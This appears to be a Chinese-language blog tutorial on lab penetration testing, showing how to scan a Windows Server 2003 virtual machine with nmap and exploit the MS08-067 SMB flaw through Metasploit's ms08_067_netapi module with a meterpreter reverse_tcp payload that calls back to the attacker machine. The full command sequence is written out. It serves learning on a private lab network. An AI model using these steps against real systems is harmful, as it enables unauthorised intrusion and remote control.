Kali第三天之Kali Linux .2渗透测试Windows 2003

时间:2024-04-17 19:58:50

靶机(目标机)                IP:192.168.108.130
攻击机Kali 2020.2               IP:192.168.108.131

 

一:先用Kali机器的nmap工具扫描下目标机器IP再说
nmap -A 192.168.108.130   
/*Nmap信息收集看到开放了80 135 139 445 1025端口,并且操作系统Windows server 2003 sp2中文版; 目标开放445端口,可能存在ms08_067漏洞。*/

/*分析下,看到有个445端口,而且是windows 2003 Server Pack2 系统, 我们知道有个著名的漏洞MS08_067 是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_067漏洞对win2000虚拟机进行渗透测试。MS08_067是一个在windows 445号端口上的漏洞,需要事先查看该端口是否开放,这里使用“nmap -PS 靶机ip”语句发现445号端口开放。因此可以使用MS08_067漏洞进行exploit。*/

 

二:利用MS08_067 漏洞渗透
MSF更新,使用命令msfupdate进行更新,发现系统提示该命令已不再支持,需使用命令apt update;  apt install metasploit-framework进行更新。
root@kali:~# msfupdate

msfupdate is no longer supported when Metasploit is part of the operating
system. Please use \'apt update; apt install metasploit-framework\'

root@kali:~# apt update
root@kali:~# apt install metasploit-framework



1:打开神器metasploit,并搜索 ms08-067 的漏洞模块
root@kali:~# msfconsole                                   #启动metasploit
msf5 > search ms08_067                                   #搜索 ms08_067 相关漏洞模块

 

2.使用搜索到的模块exploit/windows/smb/ms08_067_netapi
msf5 > use exploit/windows/smb/ms08_067_netapi                      #使用 exploit/windows/smb/ms08_067_netapi 该漏洞模块

 

3.设置payload
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads                #输入命令show payload会显示出有效的攻击载荷我们找到一个shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp  #使用 windows/meterpreter/reverse_tcp 设置攻击有效载荷

 

4.查看被攻击的机器类型
msf5 exploit(windows/smb/ms08_067_netapi) > show targets     #show targets会显示出可以被攻击的靶机的操作系统型号

/*这里会列出很多可以被攻击的主机的类型,由于这里我们的目标机器类型是windows 2003 server sp2,那么我们使用 set target 63(选择Windows 2003 SP2 English)精确定位被攻击的目标主机系统是windows 2003 server sp2*/

 

5.设置被攻击的机器类型

msf5 exploit(windows/smb/ms08_067_netapi) > set target 63    #set target 63(选择Windows 2003 SP2 English)

 

6.设置靶机(目标机)ip
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.108.130          #设置目标机器IP

 

7.设置Kaili 机器的ip,set LHOST 192.168.108.131
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.108.131

 

8.查看需要设置的参数,show options(可以看到我们所有的设置都已经准备就绪)

 

 

9.开始攻击
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

/* 尝试使用MSF的攻击模块ms08_067_netapi.rb进行攻击,试了几遍之后没成功。根据返回的信息知道目标是windows server 2003中文版,然后切换到已下目录:/usr/share/metasploit-framework/modules/exploits/windows/smb找到ms08_067_netapi.rb文件,仔细看了一遍果然没有关于中文版的攻击代码。于是找度娘,最后借鉴这篇文章,https://www.cnblogs.com/panisme/p/9222327.html 对攻击模块稍作修改。才成功。*/